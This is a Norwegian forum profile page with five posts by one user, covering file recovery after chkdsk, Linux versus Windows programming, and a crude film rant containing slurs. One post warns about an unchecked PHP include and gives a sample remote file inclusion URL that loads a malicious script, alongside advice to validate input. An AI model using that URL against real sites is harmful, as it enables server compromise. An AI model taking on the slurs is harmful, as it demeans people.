Gå til innhold

Sugx

Medlemmer
  • Innlegg

    131
  • Ble med

  • Besøkte siden sist

Innlegg skrevet av Sugx

  1. Disken bestemte seg for å lage litt bråk her. Indekstullet gikk åt helvete, kom ikke inn i mapper osv, så da sa windows, "chkdsk". Sikkert fint det, gjennoppretter filer stod det. Problemet er bare at noen av filene den gjennoppretta går det jo ikke an å lese. Så da lurte jeg bare på om det fantes noen smarte programmer som tok herpa filer og fiksa dem. Snakk om råformat her. Hadde vært skikkelig superduperkjekt, liten krise nå osv...

  2. hehe, artig idè. Men liten vits å lage en artikkel om det siden det ikke virka da. Blir som å skrive om hvordan du helte bensin over pc'en din, tente på og lot den brenne så den blei skikkelig svart og kul. Den virka ikke da, men den så svart ut.

     

    En mod bør virke, ellers er det ikke annet enn vandalisme :)

  3. nå har ikke jeg lært meg C++ (men jeg lærte meg å programmere Java på Unix) men jeg synes det er lettere/enklere å programere i unix/linux enn i windows... alt av kompilatorer er jo innebygget...

    hehe, det er en liten sannhet med modifikasjoner. Java kan være !"#¤%& å få opp.

    Compilern er ikke innebygd med mindre du installerer den da. Men alt sånt følger kanskje med i fedora/mandrake(??)

    C++ er greit sånn sett, men i forskjell fra Windows og Visual-Studio er det ikke like mye bra dokumentasjon.

     

    Om du liker å måtte skrive masse kommandoer for å få kjørt ett program er det absolutt mange muligheter for dette i windows også. Personlig er jeg tilhenger av "f5"=compile and run varianten. Sånn sett i forhold til Visual-Studio.NET som jeg har brukt litt blir IDE'ene for linux litt stusselige(KDevelop/Anjuta) men for java har du en skikkelig gromsak, forøvrig finnes denne i windows versjon også, Eclipse :dribble:

     

    Så om du skal bytte til Linux for å programmere C++, nei. Men når det er sagt finnes det mange andre gode grunner til å bytte til Linux

  4. Detta er veeeldig dårlig kode...

    Det var pga kode av denne typen at hw.no bukka under for litt siden

     

    Du må sjekke inputen, $_GET['side']

    den skal helst ikke inneholde andre tegn enn a-z 0-9, for når du kjører include på denne måten risikerer du å drite deg loddrett ut hvis noen drar det gamle urltrikset.

    index.php?side=http://minside.com/ondtphpscript.txt

    hvis du da bruker koden din, som inkluderer $_GET['side'] helt ukritisk kan morsomme ting skje...

     

    Du kan like gjerne venne deg til å sjekke om variabler er gyldige eller ikke med engang, du kommer alltid til å få bruk for det.

  5. Jeg skal innrømme at filmen var grei nok!

    Men den var for svarte ikke noe 6'er langtfra noen 5'er og ei heller noen 4'er. Til det var avslutninga hvor Frodo og Bilbo skulle ta seile vekk på homoskipet med diskokongen og dronninga altfor lang!

     

    Og for svarte, hver eneste gang det var noe tilløp til action cutta dem rett til de tre mongoloide fjellklatrerne som bare krangla om mat hele tida.

     

    Har dere lest ringenes herre? Har dere skjønt noe av storien?

    Tror ikke det, på måten dere oppfører dere på. Stikk hjem og RTFM selv om boka er så ille at jeg ælja 5 liter blod for hvert kapittel!

     

    Om dere har mer å si om sida vår eller annet, kan dere komme på irc, #dase @EFNet. bare å joine så vi kan banne dere...

     

    [edit]Setta på en skikkelig film, Cobra med Sylvester Stallone.

×
×
  • Opprett ny...